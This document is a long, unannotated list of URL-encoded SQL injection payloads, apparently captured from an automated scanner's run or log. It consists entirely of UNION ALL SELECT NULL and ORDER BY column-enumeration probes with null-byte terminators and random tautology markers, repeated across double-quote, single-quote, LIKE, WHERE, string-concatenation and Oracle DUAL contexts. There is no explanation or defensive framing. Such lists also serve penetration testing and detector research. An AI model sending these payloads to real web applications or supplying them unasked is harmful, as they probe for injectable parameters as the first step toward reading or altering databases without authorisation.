1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%28%28%22qhGS%22%3D%22qhGS 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zCET%22%3D%22zCET 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zBfi%22%3D%22zBfi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22voba%22%3D%22voba 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22GJDK%22%3D%22GJDK 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22SIef%22%3D%22SIef 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22PapX%22%3D%22PapX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22yKcR%22%3D%22yKcR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22zxet%22%3D%22zxet 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Gvbq%22%3D%22Gvbq 1%22%20ORDER%20BY%201%00%20AND%20%22ZpUs%22%3D%22ZpUs 1%22%20ORDER%20BY%201001%00%20AND%20%22oCmY%22%3D%22oCmY 1%22%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%22TuVI%22%3D%22TuVI 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%22XBed%22%3D%22XBed 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22YXnW%22%3D%22YXnW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22UOUA%22%3D%22UOUA 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22bbrT%22%3D%22bbrT 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JoLr%22%3D%22JoLr 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22iBnC%22%3D%22iBnC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22cKNv%22%3D%22cKNv 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22SKkR%22%3D%22SKkR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Ayvo%22%3D%22Ayvo 1%22%29%20ORDER%20BY%201%00%20AND%20%28%22gpWg%22%20LIKE%20%22gpWg 1%22%29%20ORDER%20BY%208358%00%20AND%20%28%22JWaN%22%20LIKE%20%22JWaN 1%22%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%22PwYI%22%20LIKE%20%22PwYI 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%22Bkyz%22%20LIKE%20%22Bkyz 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22eaLP%22%20LIKE%20%22eaLP 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22JnPr%22%20LIKE%20%22JnPr 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ztzh%22%20LIKE%20%22ztzh 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22hyPs%22%20LIKE%20%22hyPs 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22rJoH%22%20LIKE%20%22rJoH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22GJFy%22%20LIKE%20%22GJFy 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22RSAn%22%20LIKE%20%22RSAn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22AHJZ%22%20LIKE%20%22AHJZ 1%22%29%29%20ORDER%20BY%201%00%20AND%20%28%28%22odmx%22%20LIKE%20%22odmx 1%22%29%29%20ORDER%20BY%207440%00%20AND%20%28%28%22YYaH%22%20LIKE%20%22YYaH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%28%22rHHO%22%20LIKE%20%22rHHO 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%28%22OjZo%22%20LIKE%20%22OjZo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22cgDT%22%20LIKE%20%22cgDT 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22IJxK%22%20LIKE%20%22IJxK 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ONvY%22%20LIKE%20%22ONvY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22YqVj%22%20LIKE%20%22YqVj 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22kjMw%22%20LIKE%20%22kjMw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22Eavc%22%20LIKE%20%22Eavc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22eosP%22%20LIKE%20%22eosP 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22YMxw%22%20LIKE%20%22YMxw 1%22%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%22YhZG%22%20LIKE%20%22YhZG 1%22%29%29%29%20ORDER%20BY%205411%00%20AND%20%28%28%28%22CMAH%22%20LIKE%20%22CMAH 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%28%28%22aJRE%22%20LIKE%20%22aJRE 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%28%28%22yENv%22%20LIKE%20%22yENv 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Garo%22%20LIKE%20%22Garo 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22RWiX%22%20LIKE%20%22RWiX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22lhWB%22%20LIKE%20%22lhWB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22vePq%22%20LIKE%20%22vePq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Nxzq%22%20LIKE%20%22Nxzq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Wonh%22%20LIKE%20%22Wonh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22TiFS%22%20LIKE%20%22TiFS 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22qtTo%22%20LIKE%20%22qtTo 1%22%20ORDER%20BY%201%00%20AND%20%22NqHf%22%20LIKE%20%22NqHf 1%22%20ORDER%20BY%204558%00%20AND%20%22WLBi%22%20LIKE%20%22WLBi 1%22%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%22LhpR%22%20LIKE%20%22LhpR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%22IcCu%22%20LIKE%20%22IcCu 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JCcu%22%20LIKE%20%22JCcu 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22KnOL%22%20LIKE%20%22KnOL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MLLt%22%20LIKE%20%22MLLt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22NACd%22%20LIKE%20%22NACd 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MmNf%22%20LIKE%20%22MmNf 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22CbsC%22%20LIKE%20%22CbsC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ZqFb%22%20LIKE%20%22ZqFb 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MJOC%22%20LIKE%20%22MJOC 1%29%20WHERE%201889%3D1889%20ORDER%20BY%201%00 1%29%20WHERE%203573%3D3573%20ORDER%20BY%202275%00 1%29%20WHERE%206174%3D6174%20UNION%20ALL%20SELECT%20NULL%00 1%29%20WHERE%208584%3D8584%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%29%20WHERE%202842%3D2842%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%203461%3D3461%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%205853%3D5853%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%206343%3D6343%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%207967%3D7967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%207737%3D7737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%204221%3D4221%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20WHERE%202776%3D2776%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%206149%3D6149%20ORDER%20BY%201%00 1%27%29%20WHERE%202183%3D2183%20ORDER%20BY%204936%00 1%27%29%20WHERE%202507%3D2507%20UNION%20ALL%20SELECT%20NULL%00 1%27%29%20WHERE%205315%3D5315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%27%29%20WHERE%206795%3D6795%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%209720%3D9720%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%202322%3D2322%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%201269%3D1269%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%205788%3D5788%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%205546%3D5546%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%204138%3D4138%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20WHERE%204077%3D4077%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%204637%3D4637%20ORDER%20BY%201%00 1%27%20WHERE%206115%3D6115%20ORDER%20BY%209946%00 1%27%20WHERE%201141%3D1141%20UNION%20ALL%20SELECT%20NULL%00 1%27%20WHERE%208003%3D8003%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%27%20WHERE%208132%3D8132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%202409%3D2409%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%203072%3D3072%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%203786%3D3786%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%207728%3D7728%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%209341%3D9341%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%205260%3D5260%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20WHERE%208324%3D8324%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%206758%3D6758%20ORDER%20BY%201%00 1%22%20WHERE%205269%3D5269%20ORDER%20BY%202502%00 1%22%20WHERE%206771%3D6771%20UNION%20ALL%20SELECT%20NULL%00 1%22%20WHERE%202608%3D2608%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1%22%20WHERE%201461%3D1461%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207141%3D7141%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208285%3D8285%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208786%3D8786%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%203779%3D3779%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%202972%3D2972%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%207796%3D7796%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20WHERE%208359%3D8359%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20%7C%7C%20%28SELECT%208254%20FROM%20DUAL%20WHERE%202206%3D2206%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207092%20FROM%20DUAL%20WHERE%205568%3D5568%20ORDER%20BY%207279%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205453%20FROM%20DUAL%20WHERE%207027%3D7027%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207401%20FROM%20DUAL%20WHERE%206090%3D6090%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207094%20FROM%20DUAL%20WHERE%202287%3D2287%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202086%20FROM%20DUAL%20WHERE%203272%3D3272%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203162%20FROM%20DUAL%20WHERE%209816%3D9816%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205670%20FROM%20DUAL%20WHERE%209215%3D9215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203618%20FROM%20DUAL%20WHERE%209142%3D9142%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201268%20FROM%20DUAL%20WHERE%207428%3D7428%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202929%20FROM%20DUAL%20WHERE%205504%3D5504%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201012%20FROM%20DUAL%20WHERE%202749%3D2749%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207551%20WHERE%208584%3D8584%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208558%20WHERE%203779%3D3779%20ORDER%20BY%207381%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203226%20WHERE%207112%3D7112%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206081%20WHERE%204458%3D4458%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207502%20WHERE%206499%3D6499%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205441%20WHERE%207245%3D7245%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202881%20WHERE%205021%3D5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208770%20WHERE%209361%3D9361%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209410%20WHERE%204886%3D4886%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201544%20WHERE%202874%3D2874%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204214%20WHERE%205906%3D5906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203062%20WHERE%208075%3D8075%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201357%20FROM%20DUAL%20WHERE%209618%3D9618%20ORDER%20BY%201%00%20%29 1%20%2B%20%28SELECT%207856%20FROM%20DUAL%20WHERE%205720%3D5720%20ORDER%20BY%207517%00%20%29 1%20%2B%20%28SELECT%208907%20FROM%20DUAL%20WHERE%207338%3D7338%20UNION%20ALL%20SELECT%20NULL%00%20%29 1%20%2B%20%28SELECT%208503%20FROM%20DUAL%20WHERE%202658%3D2658%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207360%20FROM%20DUAL%20WHERE%203988%3D3988%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208538%20FROM%20DUAL%20WHERE%206546%3D6546%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206426%20FROM%20DUAL%20WHERE%205633%3D5633%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201560%20FROM%20DUAL%20WHERE%207871%3D7871%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202859%20FROM%20DUAL%20WHERE%209571%3D9571%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208298%20FROM%20DUAL%20WHERE%201641%3D1641%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206711%20FROM%20DUAL%20WHERE%204251%3D4251%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%209017%20FROM%20DUAL%20WHERE%207041%3D7041%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%203605%20WHERE%207641%3D7641%20ORDER%20BY%201%00%20%29 1%20%2B%20%28SELECT%207492%20WHERE%201043%3D1043%20ORDER%20BY%202840%00%20%29 1%20%2B%20%28SELECT%202216%20WHERE%202189%3D2189%20UNION%20ALL%20SELECT%20NULL%00%20%29 1%20%2B%20%28SELECT%206826%20WHERE%209868%3D9868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208158%20WHERE%206156%3D6156%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201205%20WHERE%208524%3D8524%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201397%20WHERE%204447%3D4447%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205155%20WHERE%205609%3D5609%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%205480%20WHERE%201390%3D1390%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208174%20WHERE%202612%3D2612%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201295%20WHERE%201023%3D1023%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202302%20WHERE%201360%3D1360%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%27%20%2B%20%28SELECT%20%27hJVd%27%20FROM%20DUAL%20WHERE%203157%3D3157%20ORDER%20BY%201%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CfRf%27%20FROM%20DUAL%20WHERE%207726%3D7726%20ORDER%20BY%205740%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Gvsy%27%20FROM%20DUAL%20WHERE%209428%3D9428%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Lwkq%27%20FROM%20DUAL%20WHERE%203042%3D3042%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MxRW%27%20FROM%20DUAL%20WHERE%208138%3D8138%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 